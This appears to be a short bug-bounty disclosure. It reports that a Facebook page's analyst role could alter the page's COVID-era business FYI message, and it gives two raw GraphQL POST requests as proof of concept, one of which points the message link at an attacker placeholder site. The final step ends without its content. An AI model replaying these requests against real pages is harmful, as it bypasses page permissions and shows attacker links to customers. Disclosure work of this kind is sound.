(POC) Update business fyi message as Facebook page analyst

Description / Impact

In a FB5 there is an update related to COVID-19 which allow a page to pending there customer service as a result of Coronavirus, this action require high permission to be made on behalf the page but according to my testing I observe that it ‘s possible to update business fyi message with the analyst permissions.

Proof Of Concept / Reprosteps

  • Obtain the page ID
  • Submit the request
HTTP POST /api/graphql/?av=valueObtainedFromStepOne 
Host: facebook.com
variables={"input":{"business_fyi_message_type":"POLICY_UPDATES","end_point":"settings_page_info","entry_point":"page_settings","page_id":"valueObtainedFromStepOne","actor_id":"valueObtainedFromStepOne","client_mutation_id":"4"}}&doc_id=2964825706964540
HTTP POST /api/graphql/?av=valueObtainedFromStepOne 
Host: facebook.com
variables={"input":{"business_fyi_link":"https://www.attackerSite.com/","end_point":"settings_page_info","entry_point":"page_settings","page_id":"ValueFromStepOne","actor_id":"ValueFromStepOne","client_mutation_id":"1"}}&doc_id=2674516042648125
  • The message which displayed for the customers:

Security Researcher